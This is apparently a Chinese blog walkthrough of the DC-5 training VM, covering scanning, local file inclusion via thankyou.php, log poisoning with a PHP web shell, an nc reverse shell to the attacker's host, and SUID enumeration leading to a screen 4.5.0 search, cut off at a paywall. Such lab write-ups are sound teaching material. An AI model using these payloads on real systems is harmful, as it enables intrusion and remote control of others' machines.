文章目录
环境版本:
- VMware pro 16
- Kali 2021.1(虚拟机)
- DC-5(虚拟机)
一、信息收集
1.主机发现
arp-scan -l
2.端口扫描
nmap -A -p- 192.168.2.186
挨个主机扫描发现 192.168.2.186 为靶机
发现其开放了 80 端口 nginx 服务、111 端口 rpcbind 服务、39424 端口,不知道啥服务enmm
二、漏洞发现
1.访问靶机 web 服务
发现点击其主页 contact -> submit 之后的返回页面刷新会导致下方 footer 年份随机改变
怀疑其存在文件包含
2.尝试利用文件包含漏洞
http://192.168.2.186/thankyou.php?file=/etc/passwd
发现存在该漏洞
3.尝试将恶意文件写入日志
使用 BP 对该网页进行抓包、构造流量包
/thankyou.php?<?php system($_GET['cmd']); ?>
4.利用文件包含访问日志并进行利用
攻击机开始监听:
nc -lvvp 1234 #使用 nc 进行连接利用
使用 BP 利用上一步的一句话木马进行命令执行
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.2.123 1234
得到靶机 shell
三、提权
1.查看可以 root 权限使用的命令
find / -perm -u=s -type f 2>/dev/null
发现 screen-4.5.0
2.漏洞搜索
searchsploit screen 4.5.0
最低0.47元/天 解锁文章
扫一扫
798
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
